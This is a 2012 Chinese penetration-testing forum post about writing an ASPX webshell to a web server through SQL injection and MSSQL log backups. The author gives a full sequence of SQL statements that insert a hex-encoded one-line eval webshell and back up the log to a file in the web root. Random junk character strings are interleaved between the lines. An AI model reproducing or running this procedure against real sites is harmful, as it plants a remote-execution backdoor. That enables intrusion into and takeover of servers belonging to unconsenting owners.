中国网络渗透测试联盟
标题:
关于aspx环境下log备份的一些思考
[打印本页]
作者:
admin
时间:
2012-9-5 14:57
标题:
关于aspx环境下log备份的一些思考
最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
! B* S1 U/ w9 |; q5 ]7 s( F, g
但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
) I5 ~; H& ?9 p+ t
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
( L. n) N' j$ H( b" Q6 Q: f# D- H
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
- _; p7 s" M' u) a! S
6 J5 O# S* Z1 ~3 C2 v5 T- O( B( g7 m
--------------------------------------------------------------
- {# v3 d9 [4 _( ?' S$ W, e! k
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
5 V9 }" M* b8 L- R8 x |3 d
自己修改备份语句如下:
6 {: k! m% X- l& s" _; d5 m
Drop table cmd;--
4 T4 x# G) T) e8 ^+ ^# \
alter database db_test set RECOVERY FULL;--
/ E0 N7 M- M. ^. A! p8 O
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
- [* I6 Q3 t& h/ t# M
backup log db_test to disk = 'c:\bak' with init;--
& A3 @' L0 U1 ]5 W+ q1 f
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
: C4 X" \3 l7 I9 E
delete from cmd where id>1;--删除id>1的数据
* }! z1 j9 X0 n9 [' T& C% I4 R( p
backup log db_test to disk = 'e:\webroot\test.aspx';--
$ |1 ^8 o; l+ ~1 p9 t
Drop table cmd;--
5 x- w% x* t! O$ a& h
希望对大家有用。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2